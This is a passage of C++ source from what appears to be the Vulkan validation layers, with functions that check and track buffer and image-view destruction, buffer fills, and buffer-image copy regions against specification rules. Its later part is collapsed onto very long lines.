            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT,
                            HandleToUint64(buffer), "VUID-vkDestroyBuffer-buffer-00922",
                            "Cannot free buffer %s that is in use by a command buffer.",
                            report_data->FormatHandle(buffer).c_str());
        }
    }
    return skip;
}

// Validate vkDestroyImageView(): the view must not be in use by any command buffer.
bool CoreChecks::PreCallValidateDestroyImageView(VkDevice device, VkImageView imageView, const VkAllocationCallbacks *pAllocator) {
    IMAGE_VIEW_STATE *image_view_state = GetImageViewState(imageView);
    VK_OBJECT obj_struct = {HandleToUint64(imageView), kVulkanObjectTypeImageView};

    bool skip = false;
    if (image_view_state) {
        skip |= ValidateObjectNotInUse(image_view_state, obj_struct, "vkDestroyImageView",
                                       "VUID-vkDestroyImageView-imageView-01026");
    }
    return skip;
}

// Remove tracking state for an image view about to be destroyed.
void CoreChecks::PreCallRecordDestroyImageView(VkDevice device, VkImageView imageView, const VkAllocationCallbacks *pAllocator) {
    IMAGE_VIEW_STATE *image_view_state = GetImageViewState(imageView);
    if (!image_view_state) return;
    VK_OBJECT obj_struct = {HandleToUint64(imageView), kVulkanObjectTypeImageView};

    // Any bound cmd buffers are now invalid
    InvalidateCommandBuffers(image_view_state->cb_bindings, obj_struct);
    (*GetImageViewMap()).erase(imageView);
}

// Validate vkDestroyBuffer(): the buffer must exist and be idle.
bool CoreChecks::PreCallValidateDestroyBuffer(VkDevice device, VkBuffer buffer, const VkAllocationCallbacks *pAllocator) {
    auto buffer_state = GetBufferState(buffer);

    bool skip = false;
    if (buffer_state) {
        skip |= ValidateIdleBuffer(buffer);
    }
    return skip;
}

// Tear down all tracking state for a buffer about to be destroyed: invalidate bound command buffers,
// release its memory-range bookkeeping, clear bindings, drop pending QFO release barriers, and erase the entry.
void CoreChecks::PreCallRecordDestroyBuffer(VkDevice device, VkBuffer buffer, const VkAllocationCallbacks *pAllocator) {
    if (!buffer) return;
    auto buffer_state = GetBufferState(buffer);
    VK_OBJECT obj_struct = {HandleToUint64(buffer), kVulkanObjectTypeBuffer};

    InvalidateCommandBuffers(buffer_state->cb_bindings, obj_struct);
    for (auto mem_binding : buffer_state->GetBoundMemory()) {
        auto mem_info = GetMemObjInfo(mem_binding);
        if (mem_info) {
            RemoveBufferMemoryRange(HandleToUint64(buffer), mem_info);
        }
    }
    ClearMemoryObjectBindings(HandleToUint64(buffer), kVulkanObjectTypeBuffer);
    EraseQFOReleaseBarriers<VkBufferMemoryBarrier>(buffer);
    GetBufferMap()->erase(buffer_state->buffer);
}

// Validate vkDestroyBufferView(): the view must not be in use by any command buffer.
bool CoreChecks::PreCallValidateDestroyBufferView(VkDevice device, VkBufferView bufferView,
                                                  const VkAllocationCallbacks *pAllocator) {
    auto buffer_view_state = GetBufferViewState(bufferView);
    VK_OBJECT obj_struct = {HandleToUint64(bufferView), kVulkanObjectTypeBufferView};
    bool skip = false;
    if (buffer_view_state) {
        skip |= ValidateObjectNotInUse(buffer_view_state, obj_struct, "vkDestroyBufferView",
                                       "VUID-vkDestroyBufferView-bufferView-00936");
    }
    return skip;
}

// Remove tracking state for a buffer view about to be destroyed.
void CoreChecks::PreCallRecordDestroyBufferView(VkDevice device, VkBufferView bufferView,
                                                const VkAllocationCallbacks *pAllocator) {
    if (!bufferView) return;
    auto buffer_view_state = GetBufferViewState(bufferView);
    VK_OBJECT obj_struct = {HandleToUint64(bufferView), kVulkanObjectTypeBufferView};

    // Any bound cmd buffers are now invalid
    InvalidateCommandBuffers(buffer_view_state->cb_bindings, obj_struct);
    GetBufferViewMap()->erase(bufferView);
}

bool
CoreChecks::PreCallValidateCmdFillBuffer(VkCommandBuffer commandBuffer, VkBuffer dstBuffer, VkDeviceSize dstOffset,
                                         VkDeviceSize size, uint32_t data) {
    auto cb_node = GetCBNode(commandBuffer);
    auto buffer_state = GetBufferState(dstBuffer);
    bool skip = false;
    skip |= ValidateMemoryIsBoundToBuffer(buffer_state, "vkCmdFillBuffer()", "VUID-vkCmdFillBuffer-dstBuffer-00031");
    skip |= ValidateCmdQueueFlags(cb_node, "vkCmdFillBuffer()",
                                  VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT,
                                  "VUID-vkCmdFillBuffer-commandBuffer-cmdpool");
    skip |= ValidateCmd(cb_node, CMD_FILLBUFFER, "vkCmdFillBuffer()");
    // Validate that DST buffer has correct usage flags set
    skip |= ValidateBufferUsageFlags(buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true,
                                     "VUID-vkCmdFillBuffer-dstBuffer-00029", "vkCmdFillBuffer()",
                                     "VK_BUFFER_USAGE_TRANSFER_DST_BIT");
    skip |= InsideRenderPass(cb_node, "vkCmdFillBuffer()", "VUID-vkCmdFillBuffer-renderpass");
    return skip;
}

// Record vkCmdFillBuffer: bind the destination buffer to the command buffer.
void CoreChecks::PreCallRecordCmdFillBuffer(VkCommandBuffer commandBuffer, VkBuffer dstBuffer, VkDeviceSize dstOffset,
                                            VkDeviceSize size, uint32_t data) {
    auto cb_node = GetCBNode(commandBuffer);
    auto buffer_state = GetBufferState(dstBuffer);
    // Update bindings between buffer and cmd buffer
    AddCommandBufferBindingBuffer(cb_node, buffer_state);
}

// Validate each VkBufferImageCopy region against the image's type, format, aspect, and alignment rules.
bool CoreChecks::ValidateBufferImageCopyData(uint32_t regionCount, const VkBufferImageCopy *pRegions, IMAGE_STATE *image_state,
                                             const char *function) {
    bool skip = false;

    for (uint32_t i = 0; i < regionCount; i++) {
        // 1D images: y offset must be 0 and height must be 1.
        if (image_state->createInfo.imageType == VK_IMAGE_TYPE_1D) {
            if ((pRegions[i].imageOffset.y != 0) || (pRegions[i].imageExtent.height != 1)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-srcImage-00199",
                                "%s(): pRegion[%d] imageOffset.y is %d and imageExtent.height is %d. For 1D images these must be 0 "
                                "and 1, respectively.",
                                function, i, pRegions[i].imageOffset.y, pRegions[i].imageExtent.height);
            }
        }

        // 1D and 2D images: z offset must be 0 and depth must be 1.
        if ((image_state->createInfo.imageType == VK_IMAGE_TYPE_1D) ||
            (image_state->createInfo.imageType == VK_IMAGE_TYPE_2D)) {
            if ((pRegions[i].imageOffset.z != 0) || (pRegions[i].imageExtent.depth != 1)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-srcImage-00201",
                                "%s(): pRegion[%d] imageOffset.z is %d and imageExtent.depth is %d. For 1D and 2D images these "
                                "must be 0 and 1, respectively.",
                                function, i, pRegions[i].imageOffset.z, pRegions[i].imageExtent.depth);
            }
        }

        // 3D images: baseArrayLayer must be 0 and layerCount must be 1.
        if (image_state->createInfo.imageType == VK_IMAGE_TYPE_3D) {
            if ((0 != pRegions[i].imageSubresource.baseArrayLayer) || (1 != pRegions[i].imageSubresource.layerCount)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-baseArrayLayer-00213",
                                "%s(): pRegion[%d] imageSubresource.baseArrayLayer is %d and imageSubresource.layerCount is %d. "
                                "For 3D images these must be 0 and 1, respectively.",
                                function, i, pRegions[i].imageSubresource.baseArrayLayer,
                                pRegions[i].imageSubresource.layerCount);
            }
        }

        // If the the calling command's VkImage parameter's format is not a depth/stencil format,
        // then bufferOffset must be a multiple of the calling command's VkImage parameter's element size
        uint32_t element_size = FormatElementSize(image_state->createInfo.format, pRegions[i].imageSubresource.aspectMask);

        if (!FormatIsDepthAndStencil(image_state->createInfo.format) &&
            SafeModulo(pRegions[i].bufferOffset, element_size) != 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00193",
                            "%s(): pRegion[%d] bufferOffset 0x%" PRIxLEAST64
                            " must be a multiple of this format's texel size (%" PRIu32 ").",
                            function, i, pRegions[i].bufferOffset, element_size);
        }

        // BufferOffset must be a multiple of 4
        if (SafeModulo(pRegions[i].bufferOffset, 4) != 0) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00194",
                            "%s(): pRegion[%d] bufferOffset 0x%" PRIxLEAST64 " must be a multiple of 4.", function, i,
                            pRegions[i].bufferOffset);
        }

        // BufferRowLength must be 0, or greater than or equal to the width member of imageExtent
        if ((pRegions[i].bufferRowLength != 0) && (pRegions[i].bufferRowLength < pRegions[i].imageExtent.width)) {
            skip |= log_msg(
                report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferRowLength-00195",
                "%s(): pRegion[%d] bufferRowLength (%d) must be zero or greater-than-or-equal-to imageExtent.width (%d).",
                function, i, pRegions[i].bufferRowLength, pRegions[i].imageExtent.width);
        }

        // BufferImageHeight must be 0, or greater than or equal to the height member of imageExtent
        if ((pRegions[i].bufferImageHeight != 0) && (pRegions[i].bufferImageHeight < pRegions[i].imageExtent.height)) {
            skip |= log_msg(
                report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferImageHeight-00196",
                "%s(): pRegion[%d] bufferImageHeight (%d) must be zero or greater-than-or-equal-to imageExtent.height (%d).",
                function, i, pRegions[i].bufferImageHeight, pRegions[i].imageExtent.height);
        }

        // subresource aspectMask must have exactly 1 bit set
        const int num_bits = sizeof(VkFlags) * CHAR_BIT;
        std::bitset<num_bits> aspect_mask_bits(pRegions[i].imageSubresource.aspectMask);
        if (aspect_mask_bits.count() != 1) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-aspectMask-00212",
                            "%s: aspectMasks for imageSubresource in each region must have only a single bit set.", function);
        }

        // image subresource aspect bit must match format
        if (!VerifyAspectsPresent(pRegions[i].imageSubresource.aspectMask, image_state->createInfo.format)) {
            skip |= log_msg(
                report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-aspectMask-00211",
                "%s(): pRegion[%d] subresource aspectMask 0x%x specifies aspects that are not present in image format 0x%x.",
                function, i, pRegions[i].imageSubresource.aspectMask, image_state->createInfo.format);
        }

        // Checks that apply only to compressed images
        if (FormatIsCompressed(image_state->createInfo.format) || FormatIsSinglePlane_422(image_state->createInfo.format)) {
            auto block_size = FormatTexelBlockExtent(image_state->createInfo.format);

            // BufferRowLength must be a multiple of block width
            if (SafeModulo(pRegions[i].bufferRowLength, block_size.width) != 0) {
                skip |= log_msg(
                    report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                    HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferRowLength-00203",
                    "%s(): pRegion[%d] bufferRowLength (%d) must be a multiple of the compressed image's texel width (%d)..",
                    function, i, pRegions[i].bufferRowLength, block_size.width);
            }

            // BufferRowHeight must be a multiple of block height
            if (SafeModulo(pRegions[i].bufferImageHeight, block_size.height) != 0) {
                skip |= log_msg(
                    report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                    HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferImageHeight-00204",
                    "%s(): pRegion[%d] bufferImageHeight (%d) must be a multiple of the compressed image's texel height (%d)..",
                    function, i, pRegions[i].bufferImageHeight, block_size.height);
            }

            // image offsets must be multiples of block dimensions
            if ((SafeModulo(pRegions[i].imageOffset.x, block_size.width) != 0) ||
                (SafeModulo(pRegions[i].imageOffset.y, block_size.height) != 0) ||
                (SafeModulo(pRegions[i].imageOffset.z, block_size.depth) != 0)) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageOffset-00205",
                                "%s(): pRegion[%d] imageOffset(x,y) (%d, %d) must be multiples of the compressed image's texel "
                                "width & height (%d, %d)..",
                                function, i, pRegions[i].imageOffset.x, pRegions[i].imageOffset.y, block_size.width,
                                block_size.height);
            }

            // bufferOffset must be a multiple of block size (linear bytes)
            uint32_t block_size_in_bytes = FormatElementSize(image_state->createInfo.format);
            if (SafeModulo(pRegions[i].bufferOffset, block_size_in_bytes) != 0) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                                HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00206",
                                "%s(): pRegion[%d] bufferOffset (0x%" PRIxLEAST64
                                ") must be a multiple of the compressed image's texel block size (%" PRIu32 ")..",
                                function, i, pRegions[i].bufferOffset,
block_size_in_bytes); } // imageExtent width must be a multiple of block width, or extent+offset width must equal subresource width VkExtent3D mip_extent = GetImageSubresourceExtent(image_state, &(pRegions[i].imageSubresource)); if ((SafeModulo(pRegions[i].imageExtent.width, block_size.width) != 0) && (pRegions[i].imageExtent.width + pRegions[i].imageOffset.x != mip_extent.width)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00207", "%s(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block width " "(%d), or when added to offset.x (%d) must equal the image subresource width (%d)..", function, i, pRegions[i].imageExtent.width, block_size.width, pRegions[i].imageOffset.x, mip_extent.width); } // imageExtent height must be a multiple of block height, or extent+offset height must equal subresource height if ((SafeModulo(pRegions[i].imageExtent.height, block_size.height) != 0) && (pRegions[i].imageExtent.height + pRegions[i].imageOffset.y != mip_extent.height)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00208", "%s(): pRegion[%d] extent height (%d) must be a multiple of the compressed texture block height " "(%d), or when added to offset.y (%d) must equal the image subresource height (%d)..", function, i, pRegions[i].imageExtent.height, block_size.height, pRegions[i].imageOffset.y, mip_extent.height); } // imageExtent depth must be a multiple of block depth, or extent+offset depth must equal subresource depth if ((SafeModulo(pRegions[i].imageExtent.depth, block_size.depth) != 0) && (pRegions[i].imageExtent.depth + pRegions[i].imageOffset.z != mip_extent.depth)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 
HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00209", "%s(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block depth " "(%d), or when added to offset.z (%d) must equal the image subresource depth (%d)..", function, i, pRegions[i].imageExtent.depth, block_size.depth, pRegions[i].imageOffset.z, mip_extent.depth); } } } return skip; } static bool ValidateImageBounds(const debug_report_data *report_data, const IMAGE_STATE *image_state, const uint32_t regionCount, const VkBufferImageCopy *pRegions, const char *func_name, const char *msg_code) { bool skip = false; const VkImageCreateInfo *image_info = &(image_state->createInfo); for (uint32_t i = 0; i < regionCount; i++) { VkExtent3D extent = pRegions[i].imageExtent; VkOffset3D offset = pRegions[i].imageOffset; if (IsExtentSizeZero(&extent)) // Warn on zero area subresource { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, kVUID_Core_Image_ZeroAreaSubregion, "%s: pRegion[%d] imageExtent of {%1d, %1d, %1d} has zero area", func_name, i, extent.width, extent.height, extent.depth); } VkExtent3D image_extent = GetImageSubresourceExtent(image_state, &(pRegions[i].imageSubresource)); // If we're using a compressed format, valid extent is rounded up to multiple of block size (per 18.1) if (FormatIsCompressed(image_info->format)) { auto block_extent = FormatTexelBlockExtent(image_info->format); if (image_extent.width % block_extent.width) { image_extent.width += (block_extent.width - (image_extent.width % block_extent.width)); } if (image_extent.height % block_extent.height) { image_extent.height += (block_extent.height - (image_extent.height % block_extent.height)); } if (image_extent.depth % block_extent.depth) { image_extent.depth += (block_extent.depth - (image_extent.depth % block_extent.depth)); } } if (0 != ExceedsBounds(&offset, &extent, &image_extent)) { skip |= log_msg(report_data, 
VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, msg_code, "%s: pRegion[%d] exceeds image bounds..", func_name, i); } } return skip; } static inline bool ValidateBufferBounds(const debug_report_data *report_data, IMAGE_STATE *image_state, BUFFER_STATE *buff_state, uint32_t regionCount, const VkBufferImageCopy *pRegions, const char *func_name, const char *msg_code) { bool skip = false; VkDeviceSize buffer_size = buff_state->createInfo.size; for (uint32_t i = 0; i < regionCount; i++) { VkExtent3D copy_extent = pRegions[i].imageExtent; VkDeviceSize buffer_width = (0 == pRegions[i].bufferRowLength ? copy_extent.width : pRegions[i].bufferRowLength); VkDeviceSize buffer_height = (0 == pRegions[i].bufferImageHeight ? copy_extent.height : pRegions[i].bufferImageHeight); VkDeviceSize unit_size = FormatElementSize(image_state->createInfo.format, pRegions[i].imageSubresource.aspectMask); // size (bytes) of texel or block if (FormatIsCompressed(image_state->createInfo.format) || FormatIsSinglePlane_422(image_state->createInfo.format)) { // Switch to texel block units, rounding up for any partially-used blocks auto block_dim = FormatTexelBlockExtent(image_state->createInfo.format); buffer_width = (buffer_width + block_dim.width - 1) / block_dim.width; buffer_height = (buffer_height + block_dim.height - 1) / block_dim.height; copy_extent.width = (copy_extent.width + block_dim.width - 1) / block_dim.width; copy_extent.height = (copy_extent.height + block_dim.height - 1) / block_dim.height; copy_extent.depth = (copy_extent.depth + block_dim.depth - 1) / block_dim.depth; } // Either depth or layerCount may be greater than 1 (not both). This is the number of 'slices' to copy uint32_t z_copies = std::max(copy_extent.depth, pRegions[i].imageSubresource.layerCount); if (IsExtentSizeZero(&copy_extent) || (0 == z_copies)) { // TODO: Issue warning here? Already warned in ValidateImageBounds()... 
} else { // Calculate buffer offset of final copied byte, + 1. VkDeviceSize max_buffer_offset = (z_copies - 1) * buffer_height * buffer_width; // offset to slice max_buffer_offset += ((copy_extent.height - 1) * buffer_width) + copy_extent.width; // add row,col max_buffer_offset *= unit_size; // convert to bytes max_buffer_offset += pRegions[i].bufferOffset; // add initial offset (bytes) if (buffer_size < max_buffer_offset) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, msg_code, "%s: pRegion[%d] exceeds buffer size of %" PRIu64 " bytes..", func_name, i, buffer_size); } } } return skip; } bool CoreChecks::PreCallValidateCmdCopyImageToBuffer(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_buffer_state = GetBufferState(dstBuffer); bool skip = ValidateBufferImageCopyData(regionCount, pRegions, src_image_state, "vkCmdCopyImageToBuffer"); // Validate command buffer state skip |= ValidateCmd(cb_node, CMD_COPYIMAGETOBUFFER, "vkCmdCopyImageToBuffer()"); // Command pool must support graphics, compute, or transfer operations auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool); VkQueueFlags queue_flags = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].queueFlags; if (0 == (queue_flags & (VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT | VK_QUEUE_TRANSFER_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->createInfo.commandPool), "VUID-vkCmdCopyImageToBuffer-commandBuffer-cmdpool", "Cannot call vkCmdCopyImageToBuffer() on a command buffer allocated from a pool without graphics, compute, " "or transfer capabilities.."); } skip |= ValidateImageBounds(report_data, 
src_image_state, regionCount, pRegions, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-pRegions-00182"); skip |= ValidateBufferBounds(report_data, src_image_state, dst_buffer_state, regionCount, pRegions, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-pRegions-00183"); skip |= ValidateImageSampleCount(src_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdCopyImageToBuffer(): srcImage", "VUID-vkCmdCopyImageToBuffer-srcImage-00188"); skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-srcImage-00187"); skip |= ValidateMemoryIsBoundToBuffer(dst_buffer_state, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-dstBuffer-00192"); // Validate that SRC image & DST buffer have correct usage flags set skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyImageToBuffer-srcImage-00186", "vkCmdCopyImageToBuffer()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateBufferUsageFlags(dst_buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyImageToBuffer-dstBuffer-00191", "vkCmdCopyImageToBuffer()", "VK_BUFFER_USAGE_TRANSFER_DST_BIT"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_TRANSFER_SRC_BIT, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-srcImage-01998", "VUID-vkCmdCopyImageToBuffer-srcImage-01998"); } skip |= InsideRenderPass(cb_node, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-renderpass"); bool hit_error = false; const char *src_invalid_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? 
"VUID-vkCmdCopyImageToBuffer-srcImageLayout-01397" : "VUID-vkCmdCopyImageToBuffer-srcImageLayout-00190"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].imageSubresource, "vkCmdCopyImageToBuffer()", "imageSubresource", i); skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].imageSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdCopyImageToBuffer()", src_invalid_layout_vuid, "VUID-vkCmdCopyImageToBuffer-srcImageLayout-00189", &hit_error); skip |= ValidateCopyBufferImageTransferGranularityRequirements( cb_node, src_image_state, &pRegions[i], i, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-imageOffset-01794"); skip |= ValidateImageMipLevel(cb_node, src_image_state, pRegions[i].imageSubresource.mipLevel, i, "vkCmdCopyImageToBuffer()", "imageSubresource", "VUID-vkCmdCopyImageToBuffer-imageSubresource-01703"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, pRegions[i].imageSubresource.baseArrayLayer, pRegions[i].imageSubresource.layerCount, i, "vkCmdCopyImageToBuffer()", "imageSubresource", "VUID-vkCmdCopyImageToBuffer-imageSubresource-01704"); } return skip; } void CoreChecks::PreCallRecordCmdCopyImageToBuffer(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_buffer_state = GetBufferState(dstBuffer); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, src_image_state, pRegions[i].imageSubresource, srcImageLayout); } // Update bindings between buffer/image and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingBuffer(cb_node, dst_buffer_state); } bool CoreChecks::PreCallValidateCmdCopyBufferToImage(VkCommandBuffer commandBuffer, 
VkBuffer srcBuffer, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_image_state = GetImageState(dstImage); bool skip = ValidateBufferImageCopyData(regionCount, pRegions, dst_image_state, "vkCmdCopyBufferToImage"); // Validate command buffer state skip |= ValidateCmd(cb_node, CMD_COPYBUFFERTOIMAGE, "vkCmdCopyBufferToImage()"); // Command pool must support graphics, compute, or transfer operations auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool); VkQueueFlags queue_flags = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].queueFlags; if (0 == (queue_flags & (VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT | VK_QUEUE_TRANSFER_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->createInfo.commandPool), "VUID-vkCmdCopyBufferToImage-commandBuffer-cmdpool", "Cannot call vkCmdCopyBufferToImage() on a command buffer allocated from a pool without graphics, compute, " "or transfer capabilities.."); } skip |= ValidateImageBounds(report_data, dst_image_state, regionCount, pRegions, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-pRegions-00172"); skip |= ValidateBufferBounds(report_data, dst_image_state, src_buffer_state, regionCount, pRegions, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-pRegions-00171"); skip |= ValidateImageSampleCount(dst_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdCopyBufferToImage(): dstImage", "VUID-vkCmdCopyBufferToImage-dstImage-00179"); skip |= ValidateMemoryIsBoundToBuffer(src_buffer_state, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-srcBuffer-00176"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-dstImage-00178"); skip |= ValidateBufferUsageFlags(src_buffer_state, 
VK_BUFFER_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyBufferToImage-srcBuffer-00174", "vkCmdCopyBufferToImage()", "VK_BUFFER_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyBufferToImage-dstImage-00177", "vkCmdCopyBufferToImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-dstImage-01997", "VUID-vkCmdCopyBufferToImage-dstImage-01997"); } skip |= InsideRenderPass(cb_node, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-renderpass"); bool hit_error = false; const char *dst_invalid_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdCopyBufferToImage-dstImageLayout-01396" : "VUID-vkCmdCopyBufferToImage-dstImageLayout-00181"; for (uint32_t i = 0; i < regionCount; ++i) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].imageSubresource, "vkCmdCopyBufferToImage()", "imageSubresource", i); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].imageSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdCopyBufferToImage()", dst_invalid_layout_vuid, "VUID-vkCmdCopyBufferToImage-dstImageLayout-00180", &hit_error); skip |= ValidateCopyBufferImageTransferGranularityRequirements( cb_node, dst_image_state, &pRegions[i], i, "vkCmdCopyBufferToImage()", "VUID-vkCmdCopyBufferToImage-imageOffset-01793"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, pRegions[i].imageSubresource.mipLevel, i, "vkCmdCopyBufferToImage()", "imageSubresource", "VUID-vkCmdCopyBufferToImage-imageSubresource-01701"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, pRegions[i].imageSubresource.baseArrayLayer, 